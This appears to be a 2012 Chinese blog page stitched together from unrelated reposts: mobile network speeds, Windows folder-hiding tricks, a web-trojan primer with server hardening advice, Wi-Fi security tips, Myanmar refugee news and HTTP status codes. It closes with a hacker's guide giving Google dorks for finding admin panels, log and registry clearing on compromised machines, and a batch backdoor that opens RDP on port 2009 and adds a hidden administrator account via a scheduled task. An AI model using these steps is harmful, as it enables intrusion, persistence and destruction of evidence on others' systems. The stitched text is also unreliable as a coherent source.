2012年2月

国际权威组织GSMA(全球移动通信协会)报告显示,手机宽带连接速度最慢的两个国家分别是印度和中国。韩国、澳大利亚、新西兰等亚太地区和国家,手机网速均较快。不过,GSMA认为,按照现在的发展速度,到2015年,中国手机网速可达到1384 Kbps。

继国内固网宽带被爆价格高、网速慢后,再有国际权威组织报告显示,国内手机互联网连接速度排在世界末端,仅比印度好。有分析显示,手机互联网速度慢制约了国内手机视频网站发展。



根据GSMA(全球移动通信协会)近日公布的报告,手机宽带连接速度最慢的两个国家分别是印度和中国。相反地、韩国、澳大利亚、新西兰等亚太地区和国家,手机网速均较快。截至2010年,印度和中国平均连接速度分别仅为19 kbps和50 kpbs。而日本和韩国,平均速度已达1400 kbps。

教你如何隐藏文件夹 

方法一(推荐)eg:

现需隐藏e盘bak目录下的tools文件夹e:\bak\tools 

运行:cmd
键入:attrib +s +a +h +r e:\bak\tools 

然后,你再进去看e盘bak目录下,刷新下,是否还有tools这个文件夹!
这样就做到了真正的隐藏,不管你是否显示隐藏文件,此文件夹都看不见
自己需要访问的时候怎么办? 

打开我的电脑---键入e:\bak\tools就可以直接进入,条件是,你必须要记得自己的隐藏文件夹名
现在需要取消该隐藏文件夹,命令如下: 

运行:cmd
键入:attrib -a -s -h -r e:\bak\tools 

进入e盘bak目录下,会发现tools文件夹显示出来了 

如果你想要真正隐藏文件夹,还是按上面说的比较保险。 

方法二 

我们新建一个文件夹把它命名为:你想要命名的名字.{208D2C60-3AEA-1069-A2D7-08002B30309D} ,

这样你会看到该文件夹的图标变成了网上邻居的文件图标。

要是你双击它,执行的动作不是进入文件夹而是真的进入网上邻居,不过如果你直接选中并右击该文件(其实是文件夹),那么选择“打开”即可。

去试一试吧!! 

更多的后缀: 

无关联文件 文件名.{00021401-0000-0000-c000-000000000046} 

BMP文件 文件名.{d3e34b21-9d75-101a-8c3d-00aa001a1652} 

HTML文件 文件名.{25336920-03f9-11cf-8fd0-00aa00686f13} 

媒体剪辑文件 文件名.{00022601-0000-0000-c000-000000000046} 

打印机 文件名.{2227a280-3aea-1069-A2de-08002b30309d} 

控制面板 文件名.{21ec2020-3aea-1069-A2dd-08002b30309d} 

网上邻居 文件名.{208d2c60-3aea-1069-A2d7-08002b30309d} 

拨号网络 文件名.{992cffa0-F557-101a-88ec-00dd010ccc48} 

计划任务 文件名.{D6277990-4c6a-11cf-8d87-00aa0060f5bf} 

回收站 文件名.{645ff040-5081-101b-9f08-00aa002f954e} 

Web文件夹 文件名.{Bdeadf00-C265-11d0-Bced-00a0c90ab50f} 

历史记录 文件名.{Ff393560-C2a7-11cf-Bff4-444553540000} 

收藏夹 文件名.{1a9ba3a0-143a-11cf-8350-444553540000} 

excel.{00020810-0000-0000-C000-000000000046} 

word.{00020900-0000-0000-C000-000000000046} 

media.{00022603-0000-0000-C000-000000000046} 

CAB.{0CD7A5C0-9F37-11CE-AE65-08002B2E1262} 

计划任务.{148BD520-A2AB-11CE-B11F-00AA00530503} 

搜索-计算机{1f4de370-d627-11d1-ba4f-00a0c91eedba} 

网上邻居.{208D2C60-3AEA-1069-A2D7-08002B30309D} 

我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D} 

控制面板.{21EC2020-3AEA-1069-A2DD-08002B30309D} 

打印机.{2227A280-3AEA-1069-A2DE-08002B30309D} 

html.{25336920-03f9-11cf-8fd0-00aa00686f13} 

mht.{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B} 

mshta.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B} 

我的文档.{450D8FBA-AD25-11D0-98A8-0800361B1103} 

XML.{48123bc4-99d9-11d1-a6b3-00c04fd91555} 

回收站(满).{5ef4af3a-f726-11d0-b8a2-00c04fc309a4} 

回收站.{645FF040-5081-101B-9F08-00AA002F954E} 

ftp_folder.{63da6ec0-2e98-11cf-8d82-444553540000} 

网络和拨号连接.{7007ACC7-3202-11D1-AAD2-00805FC1270E} 

写字板文档.{73FDDC80-AEA9-101A-98A7-00AA00374959} 

Temporary Offline Files Cleaner.{750fdf0f-2a26-11d1-a3ea-080036587f03} 

用户和密码.{7A9D77BD-5403-11d2-8785-2E0420524153} 

Internet 临时文件.{7BD29E00-76C1-11CF-9DD0-00A0C9034933} 

已下载的程序文件的清除程序.{8369AB20-56C9-11D0-94E8-00AA0059CE02} 

公文包.{85BBD920-42A0-1069-A2E4-08002B30309D} 

ActiveX 高速缓存文件夹.{88C6C381-2E85-11D0-94DE-444553540000} 

mail.{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE} 

历史记录.{FF393560-C2A7-11CF-BFF4-444553540000} 

目录.{fe1290f0-cfbd-11cf-a330-00aa00c16e65} 

Internet Explorer.{FBF23B42-E3F0-101B-8488-00AA003E56F8} 

Snapshot File.{FACB5ED2-7F99-11D0-ADE2-00A0C90DC8D9} 

预订文件夹.{F5175861-2688-11d0-9C5E-00AA00A45957} 

MyDocs Drop Target.{ECF03A32-103D-11d2-854D-006008059367} 

Policy Package.{ecabaebd-7f19-11d2-978E-0000f8757e2a} 

搜索结果.{e17d4fc0-5564-11d1-83f2-00a0c90dc849} 

添加网上邻居.{D4480A50-BA28-11d1-8E75-00C04FA31A86} 

Paint.{D3E34B21-9D75-101A-8C3D-00AA001A1652} 

管理工具.{D20EA4E1-3957-11d2-A40B-0C5020524153} 

字体.{D20EA4E1-3957-11d2-A40B-0C5020524152} 

Web Folders.{BDEADF00-C265-11d0-BCED-00A0C90AB50F} 

DocFind Command.{B005E690-678D-11d1-B758-00A0C90564FE} 

脱机文件夹.{AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E} 

打印机.{2227A280-3AEA-1069-A2DE-08002B30309D 

1、运行cmd 

2、在cmd窗口中输入如下命令:
md D:\test..\
(在D盘创建文件夹名为test.)
D:\test.这个文件夹普通方式是无法打开的,不信自己可以试; 

3、在运行中输入命令:
d:\test..\
(或者在命令提示符里面输入:
start d:\test..\)
即可以打开文件夹test.,并可以在文件夹内操作,和一般文件夹一样,记住,只能通过这个方式可
以打开D盘的文件夹test.; 

4、如果需要删除这个文件夹,请在cmd窗口中用命令:
rd D:\test..\ 

建立真正隐藏的文件夹,放敏感资料 

先说一下:不是attrib 的那种!
大家都知道autorun.inf免疫的原理吧。 

这里我也说略略说一下,方便新手学习下。 

其中用到了1个指令是 mkdir:意思是建立文件夹。 

不明白的可以命令行下输入:mkdir /? 

原理如下: 

在驱动器根目录建立一个不可删除的文件夹,叫做"autorun.inf",利用windows同目录文件不允许
重名这个特点,使病毒无法写入autorun.inf ,破坏病毒的启动。就这么简单。 

举个例子,现在我们免疫d:盘,如下操作: 

1: 打开cmd窗口 

2: d: 

3: md autorun.inf (建立"autorun.inf"文件夹) 

4: cd autorun.inf (进入"autorun.inf"文件夹) 

5: md tiger..\ (创建不可删除的文件夹)
这样子,d:盘里面会出现一个名为autorun.inf的文件夹,内有一个名为"tiger."的子文件夹,无法
删除的。

成功。 

对于每一个驱动器,建议都免疫一下。 

废话就说到这里。 开始今天的正题: 

上面说的无法删除的目录,可以用来放任何文件,就算里面放了文件,你看这个文件夹的大小,也
是空的。呵呵!好像里面是没有文件的,真好。但毫无疑问,肯定是要占空间的。但是有个缺点就
是,大家都看得见这个目录,如要特殊用途,就有点不方便了吧,嘿嘿,今天不小心发现了下面这
种办法。不仅能放文件,而且看都看不见,我到目前为止都还不知道它到底放到哪里去了。 

在命令行下,在任何目录下,使用dir命令可以看见当前目录下的文件和文件夹。这个应该都知道。 

你应该还看见了一个叫".."和一个叫"."的目录。 

".."目录代表上一级目录,"."代表本目录。 

但是这两个目录在图形界面模式下是不显示的,好了,很好,我的目标就是这个。 

把上面的操作改成这样。 

1: 打开cmd窗口 

2: d:
3: md tiger (建立"tiger"文件夹) 

4: cd tiger (进入"tiger"文件夹) 

5: md ...\ (创建不可删除且隐藏的文件夹)
(md ..\ 不行,我试过了=="拒绝访问") 

现在打开d盘,去tiger目录看看!发现什么了?呵呵!
什么也没有吧!
非常好!
如何打开这个目录呢? 

开始->运行->输入"D:\tiger\...\",就可以打开了,复制粘贴随便你吧!

不管怎么样,可以保证两
点:

1:看不见;

2:可以放东东。 

如何删除? 

先保证"D:\tiger\.."目录为空,如果不为空,先删除里面的文件。 

然后如下操作即可: 

1: 打开cmd窗口 

2: d: 

3: cd tiger 

4: rd e2e2~1
(为什么是rd e2e2~1==>请看下文) 

原理分析:
windows分为长文件名和短文件名。
比如你的C:\Program Files的短文件名就是:PROGRA~1
dir c:\ /x 就可以看见。
/X 显示为非 8dot3 文件名产生的短名称。格式是 /N 的格式,
短名称插在长名称前面。如果没有短名称,在其位置则
显示空白。 

为什么说这个呢? 

其实windows目录中,我猜想是允许同目录下同名文件存在的。
只要短文件名不同就可以了,遗憾的是,我现在还没有找到设置短文件名的办法。
想法也没有办法测试。 

如果你进入D:\tiger\..目录 

命令:"cd d:\tiger"-->cd e2e2~1(cd ...\不行哦)
看见了吧!这里我们只能使用短文件名访问,也就是e2e2~1,
复制粘贴都可以的!
之所以能隐藏!原因是:对于长文件名为".."的目录,windows都将其隐藏,而没有判断短文件名,
这是我们利用的地方,嘿嘿!很好!
之所以可以放文件!因为这个东西本来就存在。
当然是不能删除的了!(除非用命令行--〉必须使用短文件名) 

大家如果要编程实现!只要注意e2e2~1就可以了!其他随便玩!

一、前置知识
网页后门其实就是一段网页代码,主要以ASP和PHP代码为主。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行某些危险的操作,获得某些敏感的技术信息或者通过渗透,提权获得服务器的控制权。并且这也是攻击者控制服务器的一条通道,比一般的**更具有隐蔽性。
网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。
二、网页挂马的类型
1、框架嵌入式网络挂马IXPUB技术博客 m\u0005s7L\u0013X8b\u001EN\u0010q
网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下:

解释:在打开插入该句代码的网页后,就也就打开了页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。下面我们做过做个演示,比如在某网页中插入如下代码:

在“百度”中嵌入了“IT168安全版块”的页面。
2、js调用型网页挂马
挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个.js文件,然后利用js代码调用到挂马的网页。通常代码如下:

http://www.xxx.com/gm.js就是一个js脚本文件,通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关的选项就可以了.
3、图片伪装挂马
随着防毒技术的发展,黑手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似:中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了,。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:

注:当用户打开是,显示给用户的是,而网页代码也随之运行。
4、网络钓鱼挂马(也称为伪装调用挂马)
网络中最常见的欺骗手段,黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一个网页,利用社会工程学欺骗方法,引诱点击,当用户打开一个看似正常的页面时,网页代码随之运行,隐蔽性极高。这种方式往往和欺骗用户输入某些个人隐私信息,然后窃取个人隐私相关联。比如攻击者模仿腾讯公司设计了一个获取QQ币的页面,引诱输入QQ好和密码。等用户输入完提交后,就把这些信息发送到攻击者指定的地方。
5、伪装挂马
高级欺骗,黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏显示www.sina.com或者security.ctocio.com.cn等用户信任地址,其实却打开了被挂马的页面,从而实现欺骗,示例代码如:

上面的代码的效果,在貌似http://safe.it168.com的链接点击却打开了http://www.hacker.com.cn。
总结:上述的挂马方式都是利用了系统的漏洞,并且挂马的代码不用攻击者编写,都是实现了工具化、傻瓜化。技术门槛比较低,因此危害也特别大。
三、网页漏洞的寻找方法
网页的漏洞主要有注入漏洞、跨站漏洞、旁注漏洞、上传漏洞、暴库漏洞和程序漏洞等等。针对这么多的漏洞威胁,网站管理员要对自己的网站进行安全检测,然后进行安全设置或者代码改写。那如何来检测网站存在的漏洞呢?其实,很多攻击者都是通过一些黑客工具来检测网站的漏洞然后实施攻击的。那么网站的管理员就可以利用这些工具对网站进行安全检测,看有没有上述漏洞,笔者就不一一演示了。下面就列举一个当前比较流行的eWEBEditor在线HTML编辑器上传漏洞做个演示和分析。
1、网站**分析
eWEBEditor是一个在线的HTML编辑器,很多网站都集成这个编辑器,以方便发布信息。低版本的eWEBEditor在线HTML编辑器,存在者上传漏洞,黑客利用这点得到WEBSHELL(网页管理权限)后,修改了网站,进行了挂马操作。
其原理是:eWEBEditor的默认管理员登录页面没有更改,而且默认的用户名和密码都没有更改。攻击者登陆eWEBEditor后,添加一种新的样式类型,然后设置上传文件的类型,比如加入asp文件类型,就可以上传一个网页木马了。
2、判断分析网页漏洞
(1)攻击者判断网站是否采用了eWEBEditor的方法一般都是通过浏览网站查看相关的页面或者通过搜索引擎搜索类似"ewebeditor.asp?id="语句,只要类似的语句存在,就能判断网站确实使用了WEB编辑器。
(2)eWEBEditor编辑器可能被黑客利用的安全漏洞: a.管理员未对数据库的路径和名称进行修改,导致黑客可以利用编辑器默认路径直接对网站数据库进行下载。

b.管理员未对编辑器的后台管理路径进行修改导致黑客可以通过数据库获得的用户名和密码进行登陆或者直接输入默认的用户名和密码,直接进入编辑器的后台。
c.该WEB编辑器上传程序存在安全漏洞。

四、网页木马的防御和清除
1、防御网页木马,服务器设置非常重要,反注册、卸载危险组件:(网页后门木马调用的组件)
(1)卸载wscript.shell对象,在cmd先或者直接运行:
regsvr32 /u %windir%\system32\WSHom.Ocx
(2)卸载FSO对象,在cmd下或者直接运行:
regsvr32.exe /u %windir%\system32\scrrun.dll
(3)卸载stream对象,在cmd下或者直接运行:
regsvr32.exe /u /s "C:\Program Files\Common Files\System\ado\msado15.dll"
注:如果想恢复的话只需重新注册即可,例如:regsvr32 %windir%\system32\WSHom.Ocx
2、清理网页挂马
(1)利用雷客图ASP站长安全助手查找所有在2008-3.1日-2008.3.5日之间所有修改过的文件里是否有iframe语句和关键词,进行手工清理。
(2)也可利用雷客图ASP站长安全助手批量删除网马。
(3)检测JS文件,在2008-3.1日-2008.3.5日之间增加的JS文件全部删除。
从分析报告可以看到网站的admin路径下发现lb.asp网页木马,经分析为老兵的网页木马。(加密后依旧能通过特征码分辨,推荐网站管理员使用雷客ASP站长安全助手,经常检测网站是否被非法修改。)
提示:雷客图ASP站长安全助手可以帮助站长分析网站的安全状况,但是一定要更改它的默认用户名和密码。
3、解决eWEBEditor编辑器安全隐患
由于网站在开发时集成了eWEBEditor编辑器,删除或者替换容易导致其他问题的出现,推荐按如下方案解决:
(1)修改该编辑器的默认数据库路径和数据库名,防止被黑客非法下载。
默认登录路径admin_login.asp
默认数据库db/ewebeditor.mdb
(2)修改编辑器后台登录路径和默认的登录用户名和密码,防止黑客进入管理界面。
默认帐号admin
默认密码admin或者admin888
(3)对Upload.asp语句进行修改,防止黑客利用其上传ASP木马从而获得WEB权限。
对上传语句现在进行修改:
将原来的:sAllowExt=Replace(UCase(sAllowExt),"ASP","")
修改为:
sAllowExt=Replace(UCase(sAllowExt),"ASP",""),"CER",""),"ASA",""),"CDX",""),"HTR","")
增加上传对cer、asa、cdx、htr文件类型的限制,因为这些类型的文件都是可以执行的文件,可以被攻击者利用进行对网站及其服务器进行危险操作的文件类型。

叙利亚总统 Bashar al-Assad 正因屠杀平民而面对全世界大多数国家的指责,连黑客组织也没有放过他,在星期一攻陷了他的办公电子邮箱。这次的入侵事件由著名黑客组织无名氏(Anonymous)发动,而取得目标邮箱的密码并无需使用神马手段,因为他们使用的密码简直弱爆了,就是“12345”,根据2011的一份安全研究这是第二弱密码。
无名氏同时将邮箱内的邮件向外公布,其中一封被公布的电邮里叙利亚驻联合国发言人 Sheherazad Jaafari 表示“造成目前严峻的危机一大失误是起初没有建立一支组织严密的警察部队”并指外媒歪曲报导了事实。

安全一直是一个永恒不变的话题。随着无线网络的流行,无线网络的安全问题更加突出。因为无线网络与有线网络相比,不需要物理上线路的连接,完全借助无线电磁波进行连接,因此更容易受到入侵。不过只要我们在使用无线网络时注意下面的一些事项,同样可以保证网络的安全。

一、默认设置不能用

由于无线网络中最重要的设备之一就是无线路由器或中继器。一般来说,同一品牌的无线设备访问地址都是相同的,例如192.168.1.1等;而其默用的用户名、密码也大多为admin;其SSID标识也都一样。如果不修改这些默认的设置,那么入侵者则非常容易的通过扫描工具找到这些设备并进入管理界面,获得设备的控制权。因此,修改默认设置是一项最基本的安全措施。这不仅对无线网络设备有用,对其它共享上网的ADSL、路由等同样有效。

二、禁止SSID广播

启用SSID广播,将有利于无线网络客户端自动接收SSID号,而不必知道无线路由的SSID设置。但是对于家庭用户或有固定用户的朋友来说,完全没有必要启用SSID广播,因为这样做很容易给一些来历不明的入侵者建立连接。作为拥有固定用户客户端的环境,我们完全可以告知他们SSID标识符,让他们自己手工直接输入以建立连接即可。

三、过滤设置

一般的无线宽带路由器都会有过滤方面的设置。过滤一般包括IP地址过滤和MAC地址过滤两项。其中IP地址过滤设置相对复杂一点,一般都是通过单击“添加新条目”等类型的按钮打开创建过滤规则操作窗口,然后设置操作的IP地址,例如我们可以将允许使用的IP地址全部添加进来,同时将其设为“允许通行”,这样没有被添加进来的IP地址则无法连接;同理,如果希望获得更高级的安全,那么则可以在MAC地址过滤中将允许访问的无线客户端网卡的MAC地址添加进来,并设为允许通行即可。

四、手工指定IP

为了方便客户端设置,一般来说无线路由都会带有DHCP功能。其实,对于小规模的无线网络,我们完全可以直接手工为客户端分配IP地址,而不必使用DHCP。因为使用DHCP后,我们不太容易分辩出在线用户中哪些是正常的用户,哪些是非法用户。如果关闭DHCP,那么我们只需要查看当前在线用户,如果发现其IP地址不是分配的,那么则说明其是非法侵入的。

五、设置密钥

针对无线设置,一般来说都会要求我们进行安全认证设置。对此,虽然设置了密钥,将可能给无线客户端的使用增加操作上的复杂程度,但是这与安全相比,还是非常重要的。

六、防Ping

有一些做的比较智能的无线路由都带有防Ping的功能。例如TP-Link WR340G,登录管理界面后,打开“安全设置”,然后在“WAN口Ping”中选中“忽略来自WAN口的Ping”,这样即可躲避一些扫描器的搜索。

七、主动搜索无线网络

无线网络的安全更多的时候是来自临近用户的侵入。例如隔壁用户同样使用了无线网络,那么他在连接的时候则可能因为信号的穿透发现周围有一个无线AP,人都是好奇的,这样他就可能会想办法侵入。基于这样的道理,我们可以先关闭自己的无线AP(路由器),然后搜索一下附近是否有发射点,如果确认没有的话再开启自己的无线路由;如果有的话,那么则必须更加注意安全方面的防范。

  新快报讯 综合央视报道,近日,由于政府与叛军的武装冲突,缅甸一万多人逃亡至中国云南省地区寻求避难,这有可能引发人道主义危机,并让中国陷入复杂的外交困境。据悉,难民多为妇女儿童和老人。

缅甸民族冲突对中国边界安全构成挑战
来源:深圳电视台所属栏目:直播港澳台

最难对付的叛乱力量
近日,缅甸政府与该国最强大的反叛组织“克钦族独立军”发生冲突。双方长达17年的停战协议于去年6月被打破,致使克钦族逃往边境地区。双方在缅甸偏远北部地区发生战事。
1月中旬,缅甸政府与克伦族叛军达成了里程碑式的初步停火协议,与掸族、钦族等其他民族的反叛团体也达成了类似的协议。
但是,与“克钦独立军”的谈判尝试,一再被持续的交战打断,尽管登盛曾在去年12月初下令军方停火。早前的报道称,军方宣称自己是在自卫,反击“克钦独立军”的攻势,而克钦方面的代表则称,“克钦独立军”的基地和周围地区无端受袭。
据最新一期《简氏恐怖主义与安全快报》杂志介绍,“克钦独立军”已成为“缅甸最难以对付的一支叛乱力量。考虑到它的地理位置、军事实力和政治圆滑度,“克钦独立军”可能削弱新政府的各项努力,并在军事上和经济上构成显著威胁”。
难民几乎都是老弱妇孺
一名在缅中边境处理难民问题的克钦族代表最近表示,交战已停止,但双方都还没有撤军,这意味着,“难民们还不能回家”。
援助组织的中国工作人员表示,近日来难民人数“大幅上升”。有关救援组织提供的数据显示:自2012年1月1日以来,克钦地区持续的武装冲突已导致约4万名难民涌向中缅边境,其中有2.5万人已经越过边境,在云南寻求庇护场所。
在靠近中缅边境的盈江县,援助组织工作人员陶美思(音译)表示,当地有大约4万名难民,其中仅盈江县就有2万人,“几乎都是老弱妇孺,还有孕妇和正在哺乳的女性。”
陶美思说,许多难民住在临时的难民营里,其他人在边境两侧的学校和村庄里找到了临时的容身地,还有几千名难民在森林里流浪。
背景知识
缅甸民族大混战
在缅甸近6000万人口中,缅族占了2/3,掸族、克伦族、克钦族、孟族、佤族等是比较大的少数民族。英国殖民缅甸时期采取了“分而治之”的措施,曾造成这个东南亚国家的分裂。1947年2月,为了反对英国殖民政府“分而治之”、成立几个国家的图谋,缅族与主要少数民族在彬龙会议上签署《彬龙协议》。1948年1月4日,缅甸脱离英联邦宣布独立。但殖民者留下的阴影还是让一些少数民族武装在过去几十年中不断与中央政府对抗。缅甸现在有公开的25支民族武装和10多支不常露面的民族武装,仅掸邦就有10多支民族武装经常活动。目前,政府军主要控制了掸邦的54个城市和部分道路,而很多村庄、山区仍处于总兵力上万人的掸邦军武装控制之下,这些地区时常会发生零星冲突。
(据《环球时报》)
相关报道:缅甸局部武装冲突持续 大量难民涌入中缅边境
人民日报报道,随着缅甸的变革持续推进,缅甸政府军和少数民族武装克钦独立军的停火谈判问题日益突出。近日有消息称,双方的冲突有所升级。

1?址协议不支持的协议。

2?检测器内部错误。

3?网址格式不正确。

5?无法连接到代理服务器。

6?无法连接到服务器或找不到域名。

7?连接服务器失败。

28?操作超时。可能原因:页面执行时间过长、服务器压力大。

52?服务器未返回任何内容。

100?Continue 初始的请求已经接受,客户应当继续发送请求的其余部分。Switching Protocols 服务器将遵从客户的请求转换到另外一种协议。

200?OK 一切正常。

201?Created 服务器已经创建了文档,Location头给出了它的URL。

202?Accepted 已经接受请求,但处理尚未完成。

203?Non-Authoritative Information 文档已经正常地返回,但一些应答头可能不正确,因为使用的是文档的拷贝。

204?No Content 没有新文档,浏览器应该继续显示原来的文档。如果用户定期地刷新页面,而Servlet可以确定用户文档足够新,这个状态代码是很有用的。

205?Reset Content 没有新的内容,但浏览器应该重置它所显示的内容。用来强制浏览器清除表单输入内容。

206?Partial Content 客户发送了一个带有Range头的GET请求,服务器完成了它。

300?Multiple Choices 客户请求的文档可以在多个位置找到,这些位置已经在返回的文档内列出。如果服务器要提出优先选择,则应该在Location应答头指明。

301?Moved Permanently 客户请求的文档在其他地方,新的URL在Location头中给出,浏览器应该自动地访问新的URL。

302?Found 类似于301,但新的URL应该被视为临时性的替代,而不是永久性的。注意,在HTTP1.0中对应的状态信息是“Moved Temporatily”。出现该状态代码时,浏览器能够自动访问新的URL,因此它是一个很有用的状态代码。注意这个状态代码有时候可以和301替换使用。例如,如果浏览器错误地请求http://host/~user(缺少了后面的斜杠),有的服务器返回301,有的则返回302。严格地说,我们只能假定只有当原来的请求是GET时浏览器才会自动重定向。请参见307。

303?See Other 类似于301/302,不同之处在于,如果原来的请求是POST,Location头指定的重定向目标文档应该通过GET提取。

304?Not Modified 客户端有缓冲的文档并发出了一个条件性的请求(一般是提供If-Modified-Since头表示客户只想比指定日期更新的文档)。服务器告诉客户,原来缓冲的文档还可以继续使用。305?Use Proxy 客户请求的文档应该通过Location头所指明的代理服务器提取。

307?Temporary Redirect 和302(Found)相同。许多浏览器会错误地响应302应答进行重定向,即使原来的请求是POST,即使它实际上只能在POST请求303时才能重定向。由于这个原因,HTTP 1.1新增了307,以便更加清除地区分几个状态代码:当出现303应答时,浏览器可以跟随重定向的GET和POST请求;如果是307应答,则浏览器只能跟随对GET请求的重定向。

400?Bad Request 请求出现语法错误。

401?Unauthorized 客户试图未经授权访问受密码保护的页面。应答中会包含一个WWW-Authenticate头,浏览器据此显示用户名字/密码对话框,然后在填写合适的Authorization头后再次发出请求。

403?Forbidden 资源不可用。服务器理解客户的请求,但拒绝处理它。通常由于服务器上文件或目录的权限设置导致。

404?Not Found 无法找到指定位置的资源。这也是一个常用的应答。

405?Method Not Allowed 请求方法(GET、POST、HEAD、Delete、PUT、TRACE等)对指定的资源不适用。

406?Not Acceptable 指定的资源已经找到,但它的MIME类型和客户在Accpet头中所指定的不兼容。

407?Proxy Authentication Required 类似于401,表示客户必须先经过代理服务器的授权。

408?Request Timeout 在服务器许可的等待时间内,客户一直没有发出任何请求。客户可以在以后重复同一请求。

409?Conflict 通常和PUT请求有关。由于请求和资源的当前状态相冲突,因此请求不能成功。

410?Gone 所请求的文档已经不再可用,而且服务器不知道应该重定向到哪一个地址。它和404的不同在于,返回407表示文档永久地离开了指定的位置,而404表示由于未知的原因文档不可用。

411?Length Required 服务器不能处理请求,除非客户发送一个Content-Length头。

412?Precondition Failed 请求头中指定的一些前提条件失败。

413?Request Entity Too Large 目标文档的大小超过服务器当前愿意处理的大小。如果服务器认为自己能够稍后再处理该请求,则应该提供一个Retry-After头。

414?Request URI Too Long URI太长。

416?Requested Range Not Satisfiable 服务器不能满足客户在请求中指定的Range头。

500?Internal Server Error 服务器遇到了意料不到的情况,不能完成客户的请求。

501?Not Implemented 服务器不支持实现请求所需要的功能。例如,客户发出了一个服务器不支持的PUT请求。

502?Bad Gateway 服务器作为网关或者代理时,为了完成请求访问下一个服务器,但该服务器返回了非法的应答。

503?Service Unavailable 服务器由于维护或者负载过重未能应答。例如,Servlet可能在数据库连接池已满的情况下返回503。服务器返回503时可以提供一个Retry-After头。

504?Gateway Timeout 由作为代理或网关的服务器使用,表示不能及时地从远程服务器获得应答。

505?HTTP Version Not Supported 服务器不支持请求中所指明的HTTP版本。

10003?网址内容不是文本,无法执行文本检测

10002?网址内容不知是什么类型,无法执行文本检测。

10000?网址内容未包含指定的文字。

20000?内容被修改。

30000?检测到木马、病毒。

一、入侵前的侦察。
首先打开代理或VPN再做如下工作:
第一步:个人感觉,侦察时用来GOOGLE,用以下命令查后台和敏感信息:
site:www.****.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
site:www.*****.com inurl:login|admin|manage|manager|admin_login|login_admin|system
site:www.***.com intitle:管理|后台|登陆|
site:www.****.com intext:验证码
第二步:推荐用TOOLS出品的wwwscan_gui.exe,扫描指定网站目录。这个工具,可以自己DIY里面的字典文件。论坛里有MJJ的社工字典和其他人发的字典工具,都可以加进去。
第三步:用明小子,再次扫描指定网站的注入点、数据库、后台文件。并扫描有没有可能跨站。不要用现成的明小子,自己DIY数据库文件。甚至可以用X-CAN3.0对指定网站的端口如TELNET,FTP扫描。
第四步:根据以上信息,比如,网站类型,管理员注册信息,端口信息。再次GOOGLE收集网站足够多的信息。
二、入侵一般步骤(忽略:因为论坛MJJ们发的东西足够多也足够技术了,本人不再班门弄斧)
三、入侵后的善后工作。
毫无疑问的是三个字:别装B!
第一:别挂黑页,那是小孩子做的事,如果真要挂黑的话,不留下QQ号等个人信息,个人认为这是很重要的事。
第二:清理痕迹:建议用两个工具一是AIO,个人发现,现在的肉鸡上执行命令越来越难了,这个工具执行命令也难多了,但是清理痕迹功能始终很好,很强大。用法:路径\Aio.exe -CleanLog,另一个工具是微软自带的psloglist.exe,这个软件始终不会被杀,也很好很强大,用法,用法可以命令行下/?一下。
第三:用如下方法清理一下上网的痕迹,因为毕竟我们有时会用肉鸡上一下网等等的。
[version]
signature="$CHICAGO$"
[Defaultinstall]
delreg=deleteme
addreg=addme
[deleteme]
hkcu,"software\microsoft\internet explorer\typedurls"
hkcu,"Software\Microsoft\Windows\CurrentVersion\Applets\Paint\recent file list"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\findcomputermru"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\prnportsmru"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\recentdocs"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\runmru"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\streammru"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\streams"
将以上内容保存为 inf 文件 再在此文件点右键安装 即可清除痕迹了,INF文件放于C下,也不易发现。
第四:做下后门,毕竟象SHIFT后门容易让人发现也不强大,所以我们不如直接用BAT作入系统计划任务中:代码如下:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f //开启终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d9 /f //改为2009连接终端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7d9 /f //改为2009连接终端
net user 444 000123 /add
net localgroup administrators 444 /add
以上成为一个BAT文件,然后属性改为隐藏,放入系统计划中。定时运行。当然用这个之前必须看看它的AT服务开了没有,如没有用以下命令执行:
sc config Schedule start= auto net start schedule
当然,直接进入服务改更好便当。